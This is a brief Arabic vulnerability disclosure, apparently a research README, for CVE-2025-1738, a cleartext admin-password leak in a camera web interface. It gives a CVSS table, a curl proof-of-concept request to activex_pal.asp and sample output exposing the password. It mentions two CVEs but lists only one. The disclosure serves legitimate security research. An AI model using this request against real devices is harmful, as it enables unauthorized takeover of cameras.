
اكتشاف ثغرة يوم الصفر CVE-2025-1738
بعد الكشف المسؤول، تم تعيين اثنين من CVEs رسمية.
| CVE | CVSS v3.1 | الدرجة | CWE | النوع |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | كشف كلمة المرور بنص واضح |
يمكن لأي مستخدم محلي استرداد كلمة مرور المسؤول بنص واضح دون الحاجة إلى مصادقة مسبقة.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
يتم إرجاع كلمة مرور المسؤول بنص واضح داخل جسم الرد.
activex_pal.asp و mblogin.asp.هذا المستودع مخصص لأغراض التعليم والبحث الأمني المصرح به فقط. المؤلفون غير مسؤولين عن أي إساءة استخدام. احصل دائمًا على إذن صريح قبل اختبار أي جهاز.